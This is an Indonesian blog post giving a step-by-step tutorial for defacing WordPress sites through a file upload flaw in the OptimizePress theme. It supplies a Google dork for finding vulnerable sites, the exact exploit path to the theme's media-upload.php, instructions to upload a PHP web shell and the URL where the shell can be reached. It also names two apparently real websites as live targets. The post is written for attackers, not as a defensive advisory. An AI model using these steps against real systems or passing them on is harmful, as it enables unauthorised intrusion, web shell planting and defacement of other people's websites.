mekz mekz

Pages

Sabtu, 28 Desember 2013

Cara Deface dengan WordPress OptimizePress (file upload vulnerability)

ketemu lagi di Blog Ini
okey cekidotsimak baik baik
Langkah - Langkah :

1).Buka Google.comMasukan Dork Berikut

Dork : 
inurl:/wp-content/themes/OptimizePress/
Dork bisa di kembangin sendiri... :D


2).Pilih salah satudari sekian site yang muncul.
3).Masukan Exploit: /wp-content/themes/OptimizePress/lib/admin/media-upload.php
4).Jika Succes AkanKeluar Halaman Seperti Berikut

>>>>>>sini

5).Scroll Ke BawahNanti Ada Uploader .
6) Upload file kamu (php,jpg,txt,htm,html). Kalo bisa upload php bisa tanem shelllho.. :D
7).Jika SuccesNanti Akan Keluar Nama file/shell Kamu.

>>>>>>sini

7).Untuk Mengakses file/shellkamu letaknya disini..
             http://site/wp-content/uploads/optpress/images_comingsoon/namafilekamu

live target > http://happydogconnections.com
                   http://playingyouragame.com

Sekian dulu sobat setia :D
kalo ada yang belum paham komen aja.. ;)


Semoga Bermanfaat :t

Tidak ada komentar:

Posting Komentar